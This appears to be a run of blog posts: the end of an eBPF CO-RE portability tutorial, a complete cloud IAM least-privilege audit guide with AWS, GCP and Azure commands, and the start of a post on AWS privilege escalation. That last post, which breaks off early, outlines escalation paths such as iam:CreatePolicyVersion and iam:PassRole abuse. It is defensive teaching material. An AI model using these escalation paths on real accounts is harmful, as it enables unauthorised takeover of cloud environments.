ls /sys/kernel/btf/vmlinux

# Full confirmation
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y  ← required

What you’ll find: Ubuntu 20.04+, Debian 11+, RHEL 8.2+, Amazon Linux 2023, and GKE/EKS managed nodes all have BTF. Amazon Linux 2 and RHEL 7 do not. If you’re running those, CO-RE-based tools fall back to the legacy BCC compilation path — which requires kernel headers installed on the node.

The One Thing to Run Right Now

This command shows you the exact struct layout your running kernel uses — the same layout libbpf reads when it patches CO-RE programs at load time:

# See how your kernel defines task_struct right now
bpftool btf dump file /sys/kernel/btf/vmlinux format c | grep -A 30 '^struct task_struct {'

The output is the canonical type information for your running kernel. Every field, every offset. When libbpf loads a CO-RE program, it’s reading this to figure out whether task_struct->comm is at offset 0x620 or 0x624.

You can also see specific struct sizes and verify that two kernels differ:

# On kernel A (5.15.0-89)
bpftool btf dump file /sys/kernel/btf/vmlinux format raw | grep -w "task_struct" | head -3

# On kernel B (5.15.0-91) — same command, different output if struct changed
# This is what broke my tracer: field offset changed across a two-patch jump

The practical use: when a CO-RE eBPF tool fails to load with a BTF error, this is where you look. The error tells you which struct field the relocation failed on. This command shows you the current layout. You can confirm whether the field exists, whether it moved, whether it was renamed.
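
When you suspect a layout change, the question is always "which fields moved between these two kernels?" — a set/dict diff over the dumped offsets. A sketch with invented offsets mirroring the two-patch-version story:

```python
def diff_layout(btf_a: dict, btf_b: dict):
    """Compare two kernels' field->offset maps (as dumped from BTF) and
    report fields that moved, appeared, or disappeared."""
    changes = []
    for field in sorted(set(btf_a) | set(btf_b)):
        a, b = btf_a.get(field), btf_b.get(field)
        if a != b:
            changes.append((field, a, b))
    return changes

# Invented offsets — what bpftool btf dump might reveal for task_struct
layout_89 = {"pid": 0x4e8, "comm": 0x620}
layout_91 = {"pid": 0x4e8, "comm": 0x624, "new_field": 0x700}

fmt = lambda v: hex(v) if v is not None else "absent"
for field, old, new in diff_layout(layout_89, layout_91):
    print(field, fmt(old), "->", fmt(new))
```

In practice you would build each dict by parsing the `bpftool btf dump ... format c` output from the two kernels — but the diagnostic logic is just this comparison.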

BCC vs libbpf vs bpftrace

Three approaches to eBPF development, with distinct tradeoffs:

| | BCC | libbpf + CO-RE | bpftrace |
|---|-----|----------------|----------|
| Compilation | Runtime on target host | Build-time on dev machine | Runtime (embedded LLVM) |
| Target deployment | Compiler + headers on every node | Single static binary | bpftrace binary only |
| Portability | Compile-on-target handles it | CO-RE + BTF handles it | Internal CO-RE support |
| Memory overhead | High (Python + compiler: 200MB+) | Low (few MB binary) | Medium |
| Startup time | Seconds (compilation) | Milliseconds | Seconds (JIT compile) |
| Best for | Prototyping, development | Production tools, shipped software | Interactive debugging sessions |
| Language | Python + C | C (kernel) + C/Go/Rust (userspace) | bpftrace scripting |

For anything you’re shipping — an eBPF-based security tool, an observability agent, an open-source project — libbpf + CO-RE is the right choice. BCC is for prototyping before you commit to an implementation. bpftrace is for the 30-second debugging session on a live node.

The practical test: if you’re building something you’ll deploy as a container image or a package, it needs to be a self-contained binary with no build dependencies on the target system. That means libbpf.

Common Mistakes

| Mistake | Impact | Fix |
|---------|--------|-----|
| Direct struct dereference instead of BPF_CORE_READ | Program breaks on any kernel struct change | Use BPF_CORE_READ() for all kernel struct field access |
| Missing char LICENSE[] SEC("license") = "GPL" | GPL-only helpers (most tracing helpers) unavailable | Always include the license section |
| vmlinux.h generated on a very old kernel | Missing structs added in newer kernel releases | Regenerate from the highest kernel version you target |
| Forgetting -g flag in clang invocation | No BTF debug info → no CO-RE relocations | Always compile with -g -O2 -target bpf |
| Hardcoding struct offsets as integer constants | Breaks silently on next kernel patch | Use BTF-aware CO-RE macros exclusively |

Key Takeaways

  • Kernel structs change between releases — hardcoded offsets break across patch versions, not just major releases
  • BTF embeds full type information in the kernel at /sys/kernel/btf/vmlinux; CO-RE uses it to patch field accesses at load time
  • vmlinux.h, generated from BTF, replaces all kernel headers with a single file committed to your repository
  • BPF_CORE_READ() is the CO-RE macro — every kernel struct access in a portable program goes through it
  • libbpf skeleton generation (bpftool gen skeleton) eliminates manual fd management for map and program lifecycle
  • For production tools: libbpf + CO-RE. For one-off debugging: bpftrace. For prototyping: BCC.

What’s Next

CO-RE makes eBPF programs portable across kernel versions. EP07 takes the next question: where in the kernel’s data path does it make sense to attach them?

XDP fires before the kernel has allocated a single byte of memory for an incoming packet — before the kernel even knows whether to accept it. That hook placement is why Cilium can do line-rate load balancing and why some network filtering rules that look correct in iptables do nothing against certain traffic. The rules weren’t wrong. The hook was in the wrong place.

Next: XDP — packets processed before the kernel knows they arrived

Get EP07 in your inbox when it publishes → linuxcent.com/subscribe

AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Reading Time: 10 minutes

Meta Description: Run an AWS least privilege audit using Access Analyzer — right-size IAM policies from wildcard permissions to scoped, production-safe roles.


What Is Cloud IAM · Authentication vs Authorization · IAM Roles vs Policies · AWS IAM Deep Dive · GCP Resource Hierarchy IAM · Azure RBAC Scopes · OIDC Workload Identity · AWS IAM Privilege Escalation · AWS Least Privilege Audit


TL;DR

  • The average IAM entity uses less than 5% of its granted permissions — the 95% excess is attack surface, not waste
  • AWS Access Analyzer generates a least-privilege policy from 90 days of CloudTrail data — use it on every Lambda role, ECS task role, and EC2 instance profile
  • GCP IAM Recommender surfaces specific right-sizing suggestions based on 90-day activity and tracks them until you act on them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build aws accessanalyzer validate-policy into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

The Big Picture

  THE LEAST PRIVILEGE AUDIT CYCLE

  ┌─────────────────────────────────────────────────────────────────┐
  │  1. INVENTORY  What identities exist, what policies attached?  │
  │  aws iam get-account-authorization-details                      │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  2. CLASSIFY  Group by purpose: human / CI-CD / app / data     │
  │  Expected permission profile per class — deviations are findings│
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  3. FIND UNUSED  Granted vs Used gap (average: 95% excess)     │
  │  AWS: Access Analyzer generated policy + last-accessed data     │
  │  GCP: IAM Recommender  │  Azure: Defender + Access Reviews     │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  4. RIGHT-SIZE  Replace wildcards with scoped permissions       │
  │  Remove unused services · pin resource ARNs · add conditions   │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  5. GUARD  Validate in CI/CD before any policy merges          │
  │  aws accessanalyzer validate-policy → fail pipeline if findings │
  └────────────────────────────┬────────────────────────────────────┘
                               ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  6. MONITOR  Weekly: new findings  Quarterly: full review      │
  │  On offboarding: immediate direct-permission audit             │
  └───────────────────────────┬─────────────────────────────────────┘
                              │
                              └──────────────────── back to 1

The AWS least privilege audit tools covered in this episode map directly onto steps 3–5. The cycle is the practice.


Introduction

An AWS least privilege audit starts by measuring the gap between what each identity is granted and what it actually uses. Then it closes that gap with the tooling AWS, GCP, and Azure all provide natively. The numbers from real environments are consistently worse than teams expect.

Last year I audited an AWS account for an e-commerce company. They’d been running in production for three years. Eight engineers, two teams, a moderately complex microservices architecture. Reasonable people, competent engineers, no obvious security negligence.

When I ran the IAM Access Analyzer policy generation job against their 12 Lambda execution roles and waited for it to pull 90 days of CloudTrail data, here’s what I found:

The average Lambda role had 47 granted permissions. The average Lambda was actually using 6 of them over 90 days. That’s a utilization rate of roughly 13%. The other 87% — the 41 permissions nobody was using — sat there as silent attack surface.

The worst example was a Lambda that processed image thumbnails. Its role had AmazonS3FullAccess plus AmazonDynamoDBFullAccess plus AWSLambdaFullAccess. Someone had attached three AWS managed policies early in development to “make sure everything worked” and never came back to tighten it. The Lambda needed three permissions: s3:GetObject on one bucket, s3:PutObject on another, and logs:CreateLogGroup. That’s it. Instead it had s3:* on all S3, full DynamoDB including delete, and the ability to create and delete other Lambda functions.

If an attacker had exploited a vulnerability in that image processor — a malformed image, a dependency with a CVE — they’d have had full S3 access, full DynamoDB access, and the ability to backdoor other Lambda functions. Not because anyone intended that. Because “make it work first, fix it later” is how IAM configurations drift.

This episode is “fix it later.” The tools exist. The methodology is straightforward. What usually stands between knowing you should do this and actually doing it is simple unfamiliarity with the tooling.


The Fundamental Problem: Granted vs Used

The central insight of IAM auditing is simple: what an identity is granted and what it actually uses are rarely the same thing.

AWS has published data from their own customer environments: the average IAM entity uses less than 5% of the permissions it has been granted. That 95% excess is not merely waste. It’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.

The tools to close this gap exist on all three platforms. The difference between organizations that operate at low IAM risk and those that don’t is usually not knowledge. It’s the discipline of actually running these tools regularly and acting on what they find.


AWS IAM Auditing

Last Accessed Data — The Starting Point

AWS tracks when each service was last called by each IAM entity. This tells you which service permissions have never been used:

# Generate last-accessed data for a specific role
aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:role/LambdaImageProcessor

JOB_ID="..." # returned by the above command

# Poll until complete (usually 30-60 seconds)
aws iam get-service-last-accessed-details --job-id "${JOB_ID}"

# Parse: find services that were never called
aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | select(.TotalAuthenticatedEntities == 0) | .ServiceName'
# These services have never been accessed by this role — permissions can be removed

For finer granularity — which specific actions are used within a service:

aws iam generate-service-last-accessed-details \
  --arn arn:aws:iam::123456789012:policy/AppServerPolicy \
  --granularity ACTION_LEVEL

aws iam get-service-last-accessed-details --job-id "${JOB_ID}" \
  --output json | jq '.ServicesLastAccessed[] | 
    select(.TotalAuthenticatedEntities > 0) |
    {service: .ServiceName, last_used: .LastAuthenticated}'

Access Analyzer — Generated Least-Privilege Policies

This is the tool I use most. It pulls 90 days of CloudTrail data for a role and generates a policy containing only the actions actually called:

# Start a policy generation job
# Note: the API requires a trails list plus an accessRole that Access Analyzer
# assumes to read the trail (role name below is yours to choose)
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/LambdaImageProcessor"
  }' \
  --cloud-trail-details '{
    "trails": [{"cloudTrailArn": "arn:aws:cloudtrail:ap-south-1:123456789012:trail/management-events", "allRegions": true}],
    "accessRole": "arn:aws:iam::123456789012:role/AccessAnalyzerCloudTrailRole",
    "startTime": "2026-01-01T00:00:00Z",
    "endTime": "2026-04-01T00:00:00Z"
  }'

JOB_ID="..."
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

The output is a valid IAM policy document containing only what was called. Compare it against the current policy — the delta is everything that can be removed. I treat the generated policy as a starting point, not a final answer: occasionally a permission is needed but wasn’t exercised in the 90-day window (error handling paths, quarterly jobs, incident response capabilities). Review the generated policy against the function’s known requirements before applying it verbatim.
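The comparison can be scripted: flatten both policy documents into action sets and take the difference (a minimal sketch; the policy contents below are illustrative, and note that a literal set difference does not expand wildcards, so s3:* versus s3:GetObject surfaces as the wildcard itself):

```python
def policy_actions(policy: dict) -> set:
    """Flatten a policy document's Allow statements into a set of actions."""
    actions = set()
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        acts = stmt.get("Action", [])
        actions.update([acts] if isinstance(acts, str) else acts)
    return actions

def removable(current: dict, generated: dict) -> set:
    """Actions granted today but absent from the generated least-privilege policy."""
    return policy_actions(current) - policy_actions(generated)

current = {"Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}
generated = {"Statement": [{"Effect": "Allow",
                            "Action": ["s3:GetObject", "s3:PutObject"],
                            "Resource": "*"}]}
print(sorted(removable(current, generated)))  # ['s3:*']
```

Everything in the delta is a removal candidate, subject to the caveat about permissions that simply weren’t exercised in the window.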

Access Analyzer also identifies external sharing you may not have intended:

# Find resources shared outside the account or organization
aws accessanalyzer create-analyzer \
  --analyzer-name account-analyzer \
  --type ACCOUNT

aws accessanalyzer list-findings \
  --analyzer-arn arn:aws:accessanalyzer:ap-south-1:123456789012:analyzer/account-analyzer \
  --filter '{"status":{"eq":["ACTIVE"]}}' \
  --output table
# Shows: S3 buckets, KMS keys, Lambda functions accessible from outside the account

And validates new policies before you apply them:

# Run this in CI/CD before any IAM policy gets merged
aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")'

# Exit non-zero if findings exist — fail the pipeline
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://new-iam-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')
[ "$FINDINGS" -eq 0 ] || { echo "IAM policy has $FINDINGS security findings"; exit 1; }

CloudTrail for Targeted Investigation

When you need to understand what a specific role has been doing in detail:

# What API calls has LambdaImageProcessor made in the last 30 days?
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=Username,AttributeValue=LambdaImageProcessor \
  --start-time "$(date -d '30 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output json | jq '.Events[] | {time:.EventTime, event:.EventName, source:.EventSource}'

# All IAM changes in the last 7 days — track who changed what
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventSource,AttributeValue=iam.amazonaws.com \
  --start-time "$(date -d '7 days ago' +%Y-%m-%dT%H:%M:%S)" \
  --output table

Open Source Tooling

For a more comprehensive scan across an account:

# Prowler — runs hundreds of checks including IAM-specific ones
pip install prowler
prowler aws --profile default --services iam --output-formats json html

# Key IAM checks:
# iam_root_mfa_enabled
# iam_user_no_setup_initial_access_key
# iam_policy_no_administrative_privileges
# iam_user_access_key_unused → finds keys unused for 90+ days
# iam_role_cross_account_readonlyaccess_policy

# ScoutSuite — multi-cloud auditor with a report UI
pip install scoutsuite
scout aws --profile default --report-dir ./scout-report

GCP IAM Auditing

IAM Recommender — Automated Right-Sizing

GCP’s IAM Recommender analyses 90 days of activity and surfaces specific suggestions: “replace roles/editor with roles/storage.objectViewer.” It tells you exactly what to change, not just that something needs changing:

# List IAM recommendations for a project
gcloud recommender recommendations list \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --format=json | jq '.[] | {
    principal: .description,
    current_role: .content.operationGroups[].operations[] | select(.action=="remove") | .path,
    suggested_role: .content.operationGroups[].operations[] | select(.action=="add") | .value
  }'

# Mark a recommendation as applied (required to track progress)
gcloud recommender recommendations mark-succeeded RECOMMENDATION_ID \
  --recommender=google.iam.policy.Recommender \
  --project=my-project \
  --location=global \
  --etag ETAG

In practice, I run IAM Recommender across all GCP projects in a quarterly review. The recommendations don’t age out — GCP continues to track them until you address them or explicitly dismiss them. Dismissed without action counts as a decision; it should be documented.
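The recommendation records can be parsed the same way the jq pipeline above does; a sketch against the documented response shape (the field contents in the sample are illustrative):

```python
def role_changes(rec: dict):
    """Extract (removed_role_paths, added_roles) from one IAM Recommender
    recommendation, mirroring the jq pipeline above."""
    ops = [op for group in rec.get("content", {}).get("operationGroups", [])
              for op in group.get("operations", [])]
    removed = [op["path"] for op in ops if op.get("action") == "remove"]
    added = [op["value"] for op in ops if op.get("action") == "add"]
    return removed, added

sample = {
    "description": "Replace the current role with a smaller role",
    "content": {"operationGroups": [{"operations": [
        {"action": "remove", "path": "/iamPolicy/bindings/*/role/roles~editor"},
        {"action": "add", "value": "roles/storage.objectViewer"},
    ]}]},
}
print(role_changes(sample))
```

Feed it the JSON from `gcloud recommender recommendations list --format=json` and you get a flat replace-this-with-that worklist per principal.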

Policy Analyzer — Answering Access Questions

When you need to understand who has access to a specific resource, and why:

# Who can access a specific BigQuery dataset?
gcloud asset analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//bigquery.googleapis.com/projects/my-project/datasets/customer_analytics" \
  --output-partial-result-before-timeout

# What can a specific principal do in this project?
gcloud asset analyze-iam-policy \
  --project=my-project \
  --full-resource-name="//cloudresourcemanager.googleapis.com/projects/my-project" \
  --identity="serviceAccount:[email protected]"

Finding Public Exposure

# Org-wide scan for allUsers or allAuthenticatedUsers bindings
gcloud asset search-all-iam-policies \
  --scope=organizations/ORG_ID \
  --query="policy.members:allUsers OR policy.members:allAuthenticatedUsers" \
  --format=json | jq '.[] | {resource: .resource, policy: .policy}'

Run this in every new environment you inherit. The results reliably surface data exposure incidents waiting to happen — public GCS buckets, publicly readable BigQuery datasets, APIs exposed to any authenticated Google account.


Azure IAM Auditing

Defender for Cloud — Baseline Recommendations

# Get IAM-related security recommendations
az security assessment list --output table | grep -i -E "(identity|mfa|privileged|owner)"

# Check specific conditions:
# "MFA should be enabled on accounts with owner permissions on your subscription"
# "Deprecated accounts should be removed from your subscription"
# "External accounts with owner permissions should be removed from your subscription"

Azure Resource Graph — Bulk Role Assignment Queries

Azure Resource Graph lets you query RBAC assignments across the entire tenant in a single call — essential for large Azure estates:

# All role assignments — who has what, where
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| extend principalId = properties.principalId,
         roleId = properties.roleDefinitionId,
         scope = properties.scope
| project scope, principalId, roleId
| limit 500" \
--output table

# Find all Owner assignments at subscription scope — high-risk
az graph query -q "
AuthorizationResources
| where type =~ 'microsoft.authorization/roleassignments'
| where properties.roleDefinitionId endswith '8e3af657-a8ff-443c-a75c-2fe8c4bcb635'
| where properties.scope startswith '/subscriptions/'
| project scope, properties.principalId" \
--output table

Entra ID Access Reviews — Automated Re-Certification

Access reviews send notifications to resource owners or users asking them to confirm that access is still appropriate. When someone doesn’t respond — or responds “no” — the access is removed:

# Create a quarterly access review for subscription Owner assignments
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/identityGovernance/accessReviews/definitions" \
  --body '{
    "displayName": "Quarterly Subscription Owner Review",
    "scope": {
      "query": "/subscriptions/SUB_ID/providers/Microsoft.Authorization/roleAssignments",
      "queryType": "MicrosoftGraph"
    },
    "reviewers": [{"query": "/me", "queryType": "MicrosoftGraph"}],
    "settings": {
      "mailNotificationsEnabled": true,
      "justificationRequiredOnApproval": true,
      "autoApplyDecisionsEnabled": true,
      "defaultDecision": "Deny",          ← if no response, access is removed
      "instanceDurationInDays": 7,
      "recurrence": {
        "pattern": {"type": "absoluteMonthly", "interval": 3},
        "range": {"type": "noEnd"}
      }
    }
  }'

The defaultDecision: Deny setting is the key. Access reviews that default to preserving access on non-response don’t actually remove anything. They just document that nobody reviewed it. Defaulting to revocation means inaction removes access, which is the correct behavior for privileged roles.


The Hardening Workflow

The methodology I apply when auditing any cloud IAM configuration:

Step 1: Inventory Everything

You cannot audit what you don’t know exists.

# AWS: full IAM snapshot in one call
aws iam get-account-authorization-details --output json > iam-snapshot-$(date +%Y%m%d).json
# Contains: all users, groups, roles, policies, attachments — everything

# GCP: export all IAM-relevant assets
gcloud asset export \
  --project=my-project \
  --output-path=gs://audit-bucket/iam-snapshot-$(date +%Y%m%d).json \
  --asset-types="iam.googleapis.com/ServiceAccount,cloudresourcemanager.googleapis.com/Project"

Step 2: Classify by Function

Group identities by purpose: human engineering access, CI/CD pipelines, application workloads, data pipelines, monitoring/audit. Each class has an expected permission profile. Anything outside the expected profile for its class is a finding.

A Lambda function with iam:* is not in the expected profile for application workloads. An EC2 instance role with s3:DeleteObject on * deserves a question. A CI/CD pipeline role with secretsmanager:GetSecretValue warrants understanding what secrets it actually needs.
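The classification check reduces to set logic. A minimal sketch with hypothetical class profiles (real profiles come from your own baseline):

```python
# Hypothetical per-class expected-service profiles; anything granted outside
# the profile for its class is a finding to investigate.
PROFILES = {
    "app-workload": {"s3", "dynamodb", "logs", "sqs"},
    "ci-pipeline":  {"ecr", "codebuild", "s3", "logs"},
    "monitoring":   {"cloudwatch", "logs", "xray"},
}

def findings(identity_class: str, granted_services: set) -> set:
    """Services granted to an identity that fall outside its class profile."""
    return granted_services - PROFILES.get(identity_class, set())

print(sorted(findings("app-workload", {"s3", "logs", "iam", "lambda"})))  # ['iam', 'lambda']
```

The output is a review queue, not an automatic removal list: some findings turn out to be legitimate, but each one now requires a documented reason.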

Step 3: Find Unused Permissions

Apply the tools:
– AWS: Access Analyzer generated policies + Last Accessed Data
– GCP: IAM Recommender
– Azure: Defender for Cloud recommendations + sign-in activity analysis

For any permission unused in 90 days: document whether it’s still needed (rare operation, incident response capability) or can be removed.
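The 90-day test is mechanical once you have last-used timestamps per service; a sketch (the sample data is illustrative):

```python
from datetime import datetime, timedelta, timezone

def stale_permissions(last_used: dict, now=None, window_days=90):
    """Services whose last authenticated use is older than the window,
    or that were never used at all (last_used value of None)."""
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=window_days)
    return sorted(svc for svc, ts in last_used.items() if ts is None or ts < cutoff)

now = datetime(2026, 4, 1, tzinfo=timezone.utc)
usage = {
    "s3":       datetime(2026, 3, 28, tzinfo=timezone.utc),  # fresh
    "dynamodb": datetime(2025, 11, 2, tzinfo=timezone.utc),  # stale
    "lambda":   None,                                        # never used
}
print(stale_permissions(usage, now=now))  # ['dynamodb', 'lambda']
```

The timestamps come from the last-accessed data shown earlier; the output is the documentation queue, not an automatic deletion list.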

Step 4: Right-Size Policies

Replace broad permissions with specific ones:

// Before: attached AmazonS3FullAccess to a read-only service
{
  "Action": "s3:*",
  "Effect": "Allow",
  "Resource": "*"
}

// After: only what the service actually calls
{
  "Action": ["s3:GetObject", "s3:ListBucket"],
  "Effect": "Allow",
  "Resource": [
    "arn:aws:s3:::app-assets-prod",
    "arn:aws:s3:::app-assets-prod/*"
  ]
}

Every wildcard you remove is attack surface eliminated. Not conceptually — concretely.
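Finding the remaining wildcards is scriptable; a minimal sketch that flags Allow statements with wildcard actions or a bare wildcard resource:

```python
def wildcard_findings(policy: dict) -> list:
    """Indices of Allow statements containing a wildcard action or resource."""
    flagged = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = stmt.get("Resource", [])
        resources = [resources] if isinstance(resources, str) else resources
        if any(a == "*" or a.endswith(":*") for a in actions) or "*" in resources:
            flagged.append(i)
    return flagged

before = {"Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}
after = {"Statement": [{"Effect": "Allow",
                        "Action": ["s3:GetObject", "s3:ListBucket"],
                        "Resource": ["arn:aws:s3:::app-assets-prod",
                                     "arn:aws:s3:::app-assets-prod/*"]}]}
print(wildcard_findings(before), wildcard_findings(after))  # [0] []
```

Run it over the Step 1 snapshot and the flagged statements become the right-sizing backlog.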

Step 5: Add Conditions as Guardrails

Conditions constrain how permissions are used even when they can’t be removed:

// Require MFA for sensitive operations — applies across all roles in the account
{
  "Effect": "Deny",
  "Action": ["iam:*", "s3:Delete*", "ec2:Terminate*", "kms:*"],
  "Resource": "*",
  "Condition": {
    "BoolIfExists": { "aws:MultiFactorAuthPresent": "false" }
  }
}

// Restrict all non-service API calls to the corporate network
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "NotIpAddress": { "aws:SourceIp": ["10.0.0.0/8", "172.16.0.0/12"] },
    "Bool": { "aws:ViaAWSService": "false" }   // allow calls made through AWS services (e.g., Lambda calling S3)
  }
}

Step 6: Build It Into CI/CD

IAM configuration changes that aren’t reviewed before they reach production will drift. Make the validation automatic:

# Pre-merge check in CI — catches wildcards and dangerous permissions before they land
FINDINGS=$(aws accessanalyzer validate-policy \
  --policy-document file://changed-policy.json \
  --policy-type IDENTITY_POLICY \
  | jq '[.findings[] | select(.findingType == "ERROR" or .findingType == "SECURITY_WARNING")] | length')

if [ "$FINDINGS" -gt 0 ]; then
  echo "❌ IAM policy has $FINDINGS security findings — see below"
  aws accessanalyzer validate-policy --policy-document file://changed-policy.json \
    --policy-type IDENTITY_POLICY | jq '.findings[]'
  exit 1
fi

Step 7: Schedule Regular Reviews

IAM audit is not a one-time project. Build a cadence:

  • Weekly: Access Analyzer findings, IAM Recommender dismissals, new cross-account trust relationships
  • Monthly: Unused access keys report, inactive service accounts
  • Quarterly: Access reviews for privileged roles, full policy inventory review
  • On offboarding: Immediate review of departing engineer’s direct permissions and any roles whose trust policies name them
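The offboarding item in particular is scriptable against the Step 1 snapshot; a sketch (role and user names below are hypothetical; the CLI returns AssumeRolePolicyDocument as decoded JSON in this output):

```python
def roles_trusting(snapshot: dict, principal_arn: str) -> list:
    """Roles in an `aws iam get-account-authorization-details` snapshot whose
    trust policy names the given principal directly."""
    hits = []
    for role in snapshot.get("RoleDetailList", []):
        for stmt in role.get("AssumeRolePolicyDocument", {}).get("Statement", []):
            principals = stmt.get("Principal", {}).get("AWS", [])
            if isinstance(principals, str):
                principals = [principals]
            if principal_arn in principals:
                hits.append(role["RoleName"])
    return sorted(set(hits))

snapshot = {"RoleDetailList": [
    {"RoleName": "DeployRole",
     "AssumeRolePolicyDocument": {"Statement": [
         {"Effect": "Allow",
          "Principal": {"AWS": "arn:aws:iam::123456789012:user/departing.engineer"},
          "Action": "sts:AssumeRole"}]}},
    {"RoleName": "AppRole",
     "AssumeRolePolicyDocument": {"Statement": [
         {"Effect": "Allow",
          "Principal": {"Service": "lambda.amazonaws.com"},
          "Action": "sts:AssumeRole"}]}},
]}
print(roles_trusting(snapshot, "arn:aws:iam::123456789012:user/departing.engineer"))
```

Any role returned here keeps granting access after the user’s keys are deleted, which is why trust policies belong in the offboarding checklist.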

Quick Wins Checklist

| Check | AWS | GCP | Azure |
|---|---|---|---|
| No active root / global admin credentials | GetAccountSummary AccountAccessKeysPresent: 0 | N/A | Check Entra ID conditional access |
| MFA on all human privileged accounts | IAM credential report | Google 2FA enforcement | Conditional Access policy |
| No inactive credentials older than 90 days | Credential report LastRotated | SA key age | Entra ID sign-in activity |
| No policies with Action:* or Resource:* on write | Access Analyzer validate | N/A | Azure Policy |
| No public-facing storage | S3 Block Public Access | constraints/storage.publicAccessPrevention | Storage account public access disabled |
| Machine identities use roles, not static keys | Audit for access key creation on roles | iam.disableServiceAccountKeyCreation | Use Managed Identity |
| Permissions verified against actual usage | Access Analyzer generated policy | IAM Recommender | Defender for Cloud recommendations |

Framework Alignment

| Framework | Reference | What It Covers Here |
|---|---|---|
| CISSP | Domain 6 — Security Assessment and Testing | IAM auditing is a core cloud security assessment activity — finding over-permission before attackers do |
| CISSP | Domain 7 — Security Operations | Continuous IAM right-sizing is an operational discipline requiring tooling, cadence, and ownership |
| ISO 27001:2022 | 5.18 Access rights | Periodic review of access rights — this episode is the practical implementation of that control |
| ISO 27001:2022 | 8.2 Privileged access rights | Reviewing and right-sizing elevated permissions; detecting unused privileged access |
| ISO 27001:2022 | 8.16 Monitoring activities | Continuous IAM monitoring, CloudTrail analysis, and automated anomaly detection |
| SOC 2 | CC6.3 | Access removal processes — Access Analyzer, IAM Recommender, and Access Reviews are the tooling for CC6.3 |
| SOC 2 | CC7.1 | Threat and vulnerability identification — unused permissions are latent attack surface, identifiable and removable |

Key Takeaways

  • The average cloud identity uses less than 5% of its granted permissions — the 95% excess is attack surface, not just waste
  • AWS Access Analyzer generates a least-privilege policy from CloudTrail data — run it on every Lambda role, ECS task role, and EC2 instance profile quarterly
  • GCP IAM Recommender surfaces role right-sizing suggestions based on 90-day activity — they don’t expire until you address them
  • Azure Access Reviews with defaultDecision: Deny actually remove stale access; reviews that default to preserve do nothing meaningful
  • Build IAM policy validation into CI/CD — catch wildcards and dangerous permissions before they merge
  • Least privilege is a cycle: inventory → classify → right-size → add guardrails → monitor → repeat. Not a one-time project.

What’s Next

EP10 covers cross-system identity federation — OIDC, SAML, and the trust relationships that let a single IdP authenticate users and workloads across cloud platforms, SaaS applications, and organizational boundaries. Understanding how federation works is also understanding how it can be exploited when trust is too broad.

Next: SAML vs OIDC federation

Get EP10 in your inbox when it publishes → linuxcent.com/subscribe

AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Reading Time: 10 minutes

Meta Description: Understand how AWS privilege escalation works through iam:PassRole — learn the attack paths attackers use and the exact policies that block each one.




TL;DR

  • Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
  • iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
  • iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
  • iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
  • Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
  • Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
